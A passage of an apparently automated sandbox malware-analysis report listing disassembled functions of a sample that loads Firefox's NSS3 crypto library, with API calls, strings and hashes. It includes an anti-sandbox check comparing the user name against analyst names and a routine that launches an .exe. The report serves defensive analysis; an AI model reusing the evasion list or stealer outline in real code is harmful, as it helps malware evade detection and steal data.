                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                              • API String ID: 3732613303-3819984048
                                                                                                                                                                                                              • Opcode ID: 7b05a1201ca364eeeba9fffd79a8e76ee90e09d94755a815fab0014a06095d4e
                                                                                                                                                                                                              • Instruction ID: 98454f09a9424adbf47fb9c62298377852f8a819e2b7c5a8712839d024982c2b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b05a1201ca364eeeba9fffd79a8e76ee90e09d94755a815fab0014a06095d4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71316D3386E754DACB25AF76AC09B0A3FB4BF85765B00052AE819936B0DB708481EF51
                                                                                                                                                                                                              Function 6CB24C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C50
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C5B
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24C76
                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24CAE
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24CC9
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24CF4
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB24D0B
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24D5E
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB14F51,00000000), ref: 6CB24D68
                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CB24D85
                                                                                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CB24DA2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB24DB9
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB24DCF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                                                                                              • Opcode ID: 99b3bc7e034780686cdc2d33f679f34b694481bb6806b76b3db3cc050bb2ca8e
                                                                                                                                                                                                              • Instruction ID: dcfaf96184d2b5ad61b2665046a74f1c4dbcad82f0d9028b8f932251402d017a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99b3bc7e034780686cdc2d33f679f34b694481bb6806b76b3db3cc050bb2ca8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B4178B19001D167D7129F599841ABE36A5EB82388F094124F82A5BF01E739D869CBD3
                                                                                                                                                                                                              Function 00921927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00921A13
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(0095AC74,?), ref: 00921A2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NameUserlstrcmpi
                                                                                                                                                                                                              • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                                              • API String ID: 542268695-1784693376
                                                                                                                                                                                                              • Opcode ID: c016307a00fb66278feb4e838f376e78a1b40f3b9dd4f3cb61763d822b7b903e
                                                                                                                                                                                                              • Instruction ID: dd030c8def8060d885fab1fd08657d19e285578da4e75d5eff7497de1870b5a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c016307a00fb66278feb4e838f376e78a1b40f3b9dd4f3cb61763d822b7b903e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1121D5B190536C8BCB71DF16DD496D9BBF4BB4530AF0042D88989AA250C7B44BDDCF8A
                                                                                                                                                                                                              Function 6CACDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CACDDDE
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CACDDF5
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CACDE34
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CACDE93
                                                                                                                                                                                                              • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CACDE9D
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CACDEB4
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CACDEC3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CACDED8
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s%s,?,?), ref: 6CACDEF0
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,(NULL) (Validity Unknown)), ref: 6CACDF04
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CACDF13
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CACDF22
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CACDF33
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CACDF3C
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CACDF4B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CACDF74
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CACDF8E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                              • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                              • API String ID: 1882561532-3437882492
                                                                                                                                                                                                              • Opcode ID: 2f9289b8588ea270268160867d0ee2b3dc6bc40683c27017149fcbaa440dea28
                                                                                                                                                                                                              • Instruction ID: 7d78a31c921973fff482faf09634117229aab77dae8e7c492219fa07b3e2f593
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f9289b8588ea270268160867d0ee2b3dc6bc40683c27017149fcbaa440dea28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE51A2B1E402559BDB009F659C41ABF7AF8EF95358F194029E809E7B00E731ED45CBE2
                                                                                                                                                                                                              Function 009325E1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 224stringprocesssynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009327F1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,?,?,?), ref: 00932803
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A0), ref: 00932815
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,65158feadb3cebfa5c9a9e36f0d461fe), ref: 00932827
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A4), ref: 00932839
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00932849
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566A8), ref: 0093285B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00932864
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,EMPTY), ref: 00932880
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566B4), ref: 00932892
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009328A2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009566B8), ref: 009328B4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009328C1
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 0093241B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009328F7
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,009566BC,?), ref: 00932964
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00932972
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                                                              • String ID: .exe$65158feadb3cebfa5c9a9e36f0d461fe$EMPTY
                                                                                                                                                                                                              • API String ID: 141474312-2344941090
                                                                                                                                                                                                              • Opcode ID: a46543d2cfce2e3f05f399cb4a4ace3341f77b6d7e976aa9fe3eacee8080535e
                                                                                                                                                                                                              • Instruction ID: 2d19b38d87895c9124fba1129092e716e6dc8472f4dfb3050cba72bf6dd142bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a46543d2cfce2e3f05f399cb4a4ace3341f77b6d7e976aa9fe3eacee8080535e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 879107B2D40229ABCF21EF65DD46BCD7778AF88305F4101E5B609B7066CA70AEC98F54
                                                                                                                                                                                                              Function 6CB02D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CB02DEC
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CB02E00
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB02E2B
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB02E43
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C,?,-00000001,00000000,?), ref: 6CB02E74
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CAD4F1C,?,-00000001,00000000), ref: 6CB02E88
                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EC6
                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EE4
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB02EF8
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB02F62
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB02F86
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB02F9E
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB02FCA
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0301A
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CB0302E
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB03066
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB03085
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB030EC
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB0310C
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB03124
                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CB0314C
                                                                                                                                                                                                                • Part of subcall function 6CAE9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CB1379E,?,6CAE9568,00000000,?,6CB1379E,?,00000001,?), ref: 6CAE918D
                                                                                                                                                                                                                • Part of subcall function 6CAE9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CB1379E,?,6CAE9568,00000000,?,6CB1379E,?,00000001,?), ref: 6CAE91A0
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07AD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07CD
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA4204A), ref: 6CAB07D6
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA4204A), ref: 6CAB07E4
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,6CA4204A), ref: 6CAB0864
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CAB0880
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsSetValue.KERNEL32(00000000,?,?,6CA4204A), ref: 6CAB08CB
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08D7
                                                                                                                                                                                                                • Part of subcall function 6CAB07A0: TlsGetValue.KERNEL32(?,?,6CA4204A), ref: 6CAB08FB
                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6CB0316D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3383223490-0
                                                                                                                                                                                                              • Opcode ID: bf2244442234bf7973e68457333246f7eab4455e36ae4c7e48633ccbea075e6f
                                                                                                                                                                                                              • Instruction ID: 4072280237598cfc76f15534ee9b81ad0ae52879631f19e2ffb0aa0ebbb444b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2244442234bf7973e68457333246f7eab4455e36ae4c7e48633ccbea075e6f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40F18BB5E002499FDF00DF69D848B9EBBB4FF09318F144169EC04A7611EB31E989CB92
                                                                                                                                                                                                              Function 6CB06CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CB06943
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CB06957
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CB06972
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CB06983
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CB069AA
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CB069BE
                                                                                                                                                                                                                • Part of subcall function 6CB06910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CB069D2
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CB069DF
                                                                                                                                                                                                                • Part of subcall function 6CB06910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CB06A5B
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB06D8C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06DC5
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06DD6
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06DE7
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CB06E1F
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06E4B
                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CB06E72
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EA7
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EC4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06ED5
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06EE3
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06EF4
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F08
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06F35
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F44
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB06F5B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB06F65
                                                                                                                                                                                                                • Part of subcall function 6CB06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB0781D,00000000,6CAFBE2C,?,6CB06B1D,?,?,?,?,00000000,00000000,6CB0781D), ref: 6CB06C40
